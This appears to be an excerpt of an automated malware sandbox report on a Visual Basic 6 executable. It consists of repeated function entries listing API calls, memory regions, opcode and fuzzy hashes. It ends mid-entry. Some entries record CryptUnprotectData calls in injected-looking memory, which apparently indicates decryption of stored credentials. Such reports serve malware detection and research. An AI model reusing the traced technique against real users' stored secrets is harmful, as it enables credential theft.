                                                                            • Instruction ID: 957cf409eef2b5308f5b95b73d67bc481dc35a9c2e97e3c76976a0eac120ec5c
                                                                            • Opcode Fuzzy Hash: 005292e21a0ce41c29a5bb3cb97197b24b793ff3069bbfee0da40d7d0bf9945b
                                                                            • Instruction Fuzzy Hash: C3B15D70A00204EFCB10DFA9D989ADDBBF9FF48701F14816AE509E72A1D774A981CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 004131D3
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 004131F2
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001B0), ref: 00413231
                                                                            • __vbaFreeObj.MSVBVM60 ref: 0041323A
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413253
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041326C
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,00000098), ref: 0041328F
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 004132A8
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 004132C1
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001B4), ref: 00413350
                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413360
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 0041337C
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413395
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001A8), ref: 004133B8
                                                                            • __vbaFreeObj.MSVBVM60 ref: 004133C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: __vba$CheckHresultNew2$Free$List
                                                                            • String ID:
                                                                            • API String ID: 191279167-0
                                                                            • Opcode ID: 0189e076c9d5efc262ce43fbb6262319fadebe0c9ff8324ecd6c323a47128e77
                                                                            • Instruction ID: 8e33eca083ede9e9d7927b3d1082c978fd96161aa7538c3649da3d66af5b129e
                                                                            • Opcode Fuzzy Hash: 0189e076c9d5efc262ce43fbb6262319fadebe0c9ff8324ecd6c323a47128e77
                                                                            • Instruction Fuzzy Hash: 62711A74A10204EFCB10DFA8D989ADABBF8FF4C701F10856AE949E7351D77498418BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • #714.MSVBVM60(?,?,00000000), ref: 00412FB8
                                                                            • __vbaVarTstNe.MSVBVM60(?,?), ref: 00412FD4
                                                                            • __vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 00412FE7
                                                                            • __vbaNew2.MSVBVM60(00410D78,00415590), ref: 0041300B
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02AB004C,00410D68,00000014), ref: 00413036
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410D88,000000C0), ref: 00413064
                                                                            • __vbaFreeObj.MSVBVM60 ref: 0041306F
                                                                            • __vbaNew2.MSVBVM60(00410D78,00415590), ref: 00413084
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02AB004C,00410D68,00000014), ref: 004130A9
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410D88,000000B8), ref: 004130CF
                                                                            • __vbaFreeObj.MSVBVM60 ref: 004130D4
                                                                            • __vbaNew2.MSVBVM60(00410D78,00415590), ref: 004130E9
                                                                            • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004130FF
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02AB004C,00410D68,00000010), ref: 00413119
                                                                            • __vbaFreeObj.MSVBVM60 ref: 0041311E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: __vba$CheckHresult$Free$New2$#714AddrefList
                                                                            • String ID:
                                                                            • API String ID: 169271594-0
                                                                            • Opcode ID: b3b80b92ec15d8333eb9b3c3246bade008a2082bf285649861c3ab5ef5f36ef1
                                                                            • Instruction ID: 4a98f85b5f2451cffa3c5305a820f52c5b030b6f886d997e5b8dc69c5189b2a8
                                                                            • Opcode Fuzzy Hash: b3b80b92ec15d8333eb9b3c3246bade008a2082bf285649861c3ab5ef5f36ef1
                                                                            • Instruction Fuzzy Hash: 47519F70940208ABDB10DFA5DD85BDEBBB8FF08701F20452AF505B32A5D7786A84CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413453
                                                                            • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041346C
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001B0), ref: 004134AF
                                                                            • __vbaFreeObj.MSVBVM60 ref: 004134B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: __vba$CheckFreeHresultNew2
                                                                            • String ID:
                                                                            • API String ID: 1645334062-0
                                                                            • Opcode ID: 9b0b8f43b972313a3dcf03e168d4af77cfb9f6113aba227b4e60536bc9fa8f8b
                                                                            • Instruction ID: 3d4c43bdfab32484a5b8e1ad1c15971ec860270725315644385596aebc0ccda6
                                                                            • Opcode Fuzzy Hash: 9b0b8f43b972313a3dcf03e168d4af77cfb9f6113aba227b4e60536bc9fa8f8b
                                                                            • Instruction Fuzzy Hash: 80116070A00305EBC711DFA8CA49BDABBB8FB4C701F108529F545E7790D778A9418BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1E2957B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: \Op $\Op $lMp
                                                                            • API String ID: 4139908857-73792396
                                                                            • Opcode ID: c18127540696dd5a7c145c94cfa9fe779d0a3539ec84d6631d12c867d73c5a54
                                                                            • Instruction ID: d5ed65af9261f9c74734a9a43044db52e5147b98619217211d7ab57b696b5bd7
                                                                            • Opcode Fuzzy Hash: c18127540696dd5a7c145c94cfa9fe779d0a3539ec84d6631d12c867d73c5a54
                                                                            • Instruction Fuzzy Hash: B6C1A0B4B007569FCB04DF79C490A9EBBF6BF88214B108A2DC44ADB751DB34E946DB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0128699F
                                                                            • LdrInitializeThunk.NTDLL ref: 0128737D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                            • String ID:
                                                                            • API String ID: 243558500-0
                                                                            • Opcode ID: 7019775b9cea7c4645e23364fce02decc6b6ea0e3c5e0fbec1cffa9e8d49c9c8
                                                                            • Instruction ID: 481775870f18be2a1d18ce6f44a96280de79fa4257324a8c00880e320444a019
                                                                            • Opcode Fuzzy Hash: 7019775b9cea7c4645e23364fce02decc6b6ea0e3c5e0fbec1cffa9e8d49c9c8
                                                                            • Instruction Fuzzy Hash: CEA25A74A15228CFCB65EF70C8986ADB7B6BF48305F1080EAE50AA3344DB359E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1D20A62D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7441733856.000000001D200000.00000040.00000010.sdmp, Offset: 1D200000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: 386904f3c7d54389eb43a3184c8a0dfd5a7133263d5be044f1ea94989aab78d6
                                                                            • Instruction ID: 8ee87509340f5d5af3f5f91ebe6cb0941f25863017c62ca0efd08f99adc00e23
                                                                            • Opcode Fuzzy Hash: 386904f3c7d54389eb43a3184c8a0dfd5a7133263d5be044f1ea94989aab78d6
                                                                            • Instruction Fuzzy Hash: 0A1126768402099FDB10CF99D844BEEBFF9EF48320F10841AEA54A7210D375AA54DFA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1D20A62D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7441733856.000000001D200000.00000040.00000010.sdmp, Offset: 1D200000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: 57c0e7c93490cd718bacad3037c603fda5ee87ce231afe0600cc2838f66e9003
                                                                            • Instruction ID: 68fc0baefc7bb00ba755353313cb0fa173f32eb247b33d5282b032a01bef489f
                                                                            • Opcode Fuzzy Hash: 57c0e7c93490cd718bacad3037c603fda5ee87ce231afe0600cc2838f66e9003
                                                                            • Instruction Fuzzy Hash: F01126768002099FDF10CF99D844BDEBBF9EF48320F50841AE654A7211D379A954DFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \$\$\
                                                                            • API String ID: 0-3791832595
                                                                            • Opcode ID: 3df3769c2bc2ccbfc98c7e070a83a6c5b5aa528df4bdceb91d0656e256316348
                                                                            • Instruction ID: 73212ad2e24a11e1dafd5325cf4684232f7f7cb6ee3b66e7901e0396061a86ee
                                                                            • Opcode Fuzzy Hash: 3df3769c2bc2ccbfc98c7e070a83a6c5b5aa528df4bdceb91d0656e256316348
                                                                            • Instruction Fuzzy Hash: B332E230B103158FDF16DBB8D8546AEBBF2AF84304F14896AD506DB385DB75EC468B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0128699F
                                                                            • LdrInitializeThunk.NTDLL ref: 0128737D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                                            • String ID:
                                                                            • API String ID: 243558500-0
                                                                            • Opcode ID: b0b2582c1fc439b00bbea7db1a76944ff32bf9ff598f977c992780742419f7a9
                                                                            • Instruction ID: f3bd03bea9104b02ff717f4257906b7306dceab7eb0a4c073f4d8c05a13bcd4a
                                                                            • Opcode Fuzzy Hash: b0b2582c1fc439b00bbea7db1a76944ff32bf9ff598f977c992780742419f7a9
                                                                            • Instruction Fuzzy Hash: B0624B74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344CB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1DAB2B1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7442394718.000000001DAB0000.00000040.00000010.sdmp, Offset: 1DAB0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: &p
                                                                            • API String ID: 1029625771-2850493262
                                                                            • Opcode ID: 18c965b25339ce38caff490314c214846c44cfdebdba486434d061f28f351f77
                                                                            • Instruction ID: c48e5193f47645f7ca2a811e7d7985c0ba54a2dab5163fb109af74d6ea8fdc55
                                                                            • Opcode Fuzzy Hash: 18c965b25339ce38caff490314c214846c44cfdebdba486434d061f28f351f77
                                                                            • Instruction Fuzzy Hash: 8F1103B69002499FDB10CF9AD484BEEFBF8AB88310F10882AD915A7200C375A545CFA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8f4b48daf7b75215e4d60271d40402a57c2ca2384467576ed7d21b6a1cc3fbae
                                                                            • Instruction ID: a68787e4210e7fc1e96f6cc7378d00e43ad94eef9e97024ef00bbf00cd67b85f
                                                                            • Opcode Fuzzy Hash: 8f4b48daf7b75215e4d60271d40402a57c2ca2384467576ed7d21b6a1cc3fbae
                                                                            • Instruction Fuzzy Hash: 83624D74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 10dcaf0d1e2c09582105a877205b9386f2e7a8b40939ce1a78a4f6c30b8495c5
                                                                            • Instruction ID: b766e98f2523ee9a46a5e9c40055cb40a376190d2dccee83756b75c6a83e112a
                                                                            • Opcode Fuzzy Hash: 10dcaf0d1e2c09582105a877205b9386f2e7a8b40939ce1a78a4f6c30b8495c5
                                                                            • Instruction Fuzzy Hash: 71525C74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a6706a208f8ccaa90f3ed1eef2b8d9e5b6516e9aa7ad61a7f51a25b6868bdd46
                                                                            • Instruction ID: b7aa677ee0b2b3023c35b98d8ad312d424419f2e365823d28019e3bf219cd8a7
                                                                            • Opcode Fuzzy Hash: a6706a208f8ccaa90f3ed1eef2b8d9e5b6516e9aa7ad61a7f51a25b6868bdd46
                                                                            • Instruction Fuzzy Hash: 76525C74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 69958eb73e8eac10bc4dd8c9df40cae77ea9ab9af8fc420594b3faaee98bca11
                                                                            • Instruction ID: c8ada00d1a37fb3aae691cf0b6565de32d53cda67f168a98aa46cc5296fd8b50
                                                                            • Opcode Fuzzy Hash: 69958eb73e8eac10bc4dd8c9df40cae77ea9ab9af8fc420594b3faaee98bca11
                                                                            • Instruction Fuzzy Hash: 84525C74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e5f551bfd1effb123750e38839e2d6332e85b45ea2e242fbe1a804de4ff650b9
                                                                            • Instruction ID: 088b9c007f172e44503a34d3106ff50d51bb7d341be92a3311daa6fcee04cb92
                                                                            • Opcode Fuzzy Hash: e5f551bfd1effb123750e38839e2d6332e85b45ea2e242fbe1a804de4ff650b9
                                                                            • Instruction Fuzzy Hash: A9525D74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 70f987b5f27a08a432c62f004560f490957b11e6b57fdd87e20e70a3196d3d25
                                                                            • Instruction ID: 0a2481cee3a77eca5715c216b695d796cfaf9431a918e119f887e5e9c0be5fbd
                                                                            • Opcode Fuzzy Hash: 70f987b5f27a08a432c62f004560f490957b11e6b57fdd87e20e70a3196d3d25
                                                                            • Instruction Fuzzy Hash: 6C525C74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344CB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7d6485f8877908a2e2e837eb971c4c33eadbf84f60a3fac609e46d4a37e55f87
                                                                            • Instruction ID: 2a3ce3f05d990666b0f9bfa94491a03123f685d91d60ada20f75e8f9302a855a
                                                                            • Opcode Fuzzy Hash: 7d6485f8877908a2e2e837eb971c4c33eadbf84f60a3fac609e46d4a37e55f87
                                                                            • Instruction Fuzzy Hash: A6524C74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344CB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: fad2e528915a2bb3a1871ccca8269f91a125f7e5975409221f7b642b0552774b
                                                                            • Instruction ID: 04ee437ec1033e24596502f5259e2bb098d177cb9f942efe48949a9f8edba468
                                                                            • Opcode Fuzzy Hash: fad2e528915a2bb3a1871ccca8269f91a125f7e5975409221f7b642b0552774b
                                                                            • Instruction Fuzzy Hash: E2525D74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344CB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2b6cc93fa716fe68c323824df71a8502049cac6b4681d3fe3804b6938351e48f
                                                                            • Instruction ID: 6e1b61250701cb074e39c062c7bfe5f4e511ed37304daafd367344154c37fca9
                                                                            • Opcode Fuzzy Hash: 2b6cc93fa716fe68c323824df71a8502049cac6b4681d3fe3804b6938351e48f
                                                                            • Instruction Fuzzy Hash: B1425E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6813a5fa41d91ca0f656161ef01784df4f9b7c0d81c8140f05c3ddbd11c67e02
                                                                            • Instruction ID: 7d1bb2cb8374e1e054c47e30ca18f3b6592e49a358470c044a904cf9c4b891eb
                                                                            • Opcode Fuzzy Hash: 6813a5fa41d91ca0f656161ef01784df4f9b7c0d81c8140f05c3ddbd11c67e02
                                                                            • Instruction Fuzzy Hash: F6425D74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5fdcfa1821226cce29d1f9bddd32d14aed0f8483cacb209c712d08b45a0bd17e
                                                                            • Instruction ID: 0814d29f3d8e5fbf1d9c095f125bfa93100eb124ded9ebd7628260ecd1a182f5
                                                                            • Opcode Fuzzy Hash: 5fdcfa1821226cce29d1f9bddd32d14aed0f8483cacb209c712d08b45a0bd17e
                                                                            • Instruction Fuzzy Hash: 19425E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: fe8ab0cb979f9db543bdc523ccab6c74914479ffc5c95ca344987f46209ec2f8
                                                                            • Instruction ID: f5ad6f4a25debf0e99ac4d2905204c81d8f97ca6be4883e39d2c99755a2da442
                                                                            • Opcode Fuzzy Hash: fe8ab0cb979f9db543bdc523ccab6c74914479ffc5c95ca344987f46209ec2f8
                                                                            • Instruction Fuzzy Hash: CC424E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: eeba07092cb10c21692a5be6183b27919ee83b4afbef85b7a0e7e400335cdb2f
                                                                            • Instruction ID: a846ac6456499600502b1d8dab6fba110fafa1b0b49e67009d6ba6a0aabfeb84
                                                                            • Opcode Fuzzy Hash: eeba07092cb10c21692a5be6183b27919ee83b4afbef85b7a0e7e400335cdb2f
                                                                            • Instruction Fuzzy Hash: 9F424E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: cff083ecd0809811c463fb6643c70c13b112d0888e231fffa515efeafa397d60
                                                                            • Instruction ID: 1bace8468642a388789e3043c325b3b5bf257de34eccc9dbbb2b7cdae5034d69
                                                                            • Opcode Fuzzy Hash: cff083ecd0809811c463fb6643c70c13b112d0888e231fffa515efeafa397d60
                                                                            • Instruction Fuzzy Hash: 37424E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d703609685468846c77ac8a114bd2dd93d6cfd4f02e369eaa82dcee1f509d727
                                                                            • Instruction ID: 5913823e3180f3f3433b595c005ec6a45a21b5432f0a0a7bf6bca29dead78555
                                                                            • Opcode Fuzzy Hash: d703609685468846c77ac8a114bd2dd93d6cfd4f02e369eaa82dcee1f509d727
                                                                            • Instruction Fuzzy Hash: 12424E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b93fcd1fa3b62e6a1a96c0f5038907c871a1c7775a5e72925f932a37c82e5ddd
                                                                            • Instruction ID: bdcd054194523694522e78028a748df04f2a85cd49d65d3b217228f0e6c44ed2
                                                                            • Opcode Fuzzy Hash: b93fcd1fa3b62e6a1a96c0f5038907c871a1c7775a5e72925f932a37c82e5ddd
                                                                            • Instruction Fuzzy Hash: 51324E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 02c283e4cdf062a28c2adae93891e4db8f7261ba21aa076cb131d89995ebf1cb
                                                                            • Instruction ID: 2489ee110bda18897cf4d34e657d8a31f9616de316402ea68cb5458bf34c7e5f
                                                                            • Opcode Fuzzy Hash: 02c283e4cdf062a28c2adae93891e4db8f7261ba21aa076cb131d89995ebf1cb
                                                                            • Instruction Fuzzy Hash: A5324E74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c431020faebf16232d739908ffa6ca863032f9d2c452907c7fbbe05ea2e77b9b
                                                                            • Instruction ID: 5ed94cf05e8ff63eb743b69d1a6acbfad5645d527403b9356687a017b006df48
                                                                            • Opcode Fuzzy Hash: c431020faebf16232d739908ffa6ca863032f9d2c452907c7fbbe05ea2e77b9b
                                                                            • Instruction Fuzzy Hash: DD324F74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 657478401d967666e981ff9cfe6bb54694f407fe9a1f286717175c62f7af3168
                                                                            • Instruction ID: 3554c144a4b5788a6fb17392161bb1ed319fe7deb4414ad22b2883ced6d42640
                                                                            • Opcode Fuzzy Hash: 657478401d967666e981ff9cfe6bb54694f407fe9a1f286717175c62f7af3168
                                                                            • Instruction Fuzzy Hash: FB324F74A15224CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8bafd3f3c844d8cb9feec0490b94f0f31ed4f101fb53fd0b53b0ea194e203a2e
                                                                            • Instruction ID: ea500ab04942af413507190ce0fd3fc4a6eabaa9d5e7b5b8e74e854a4c4bb00c
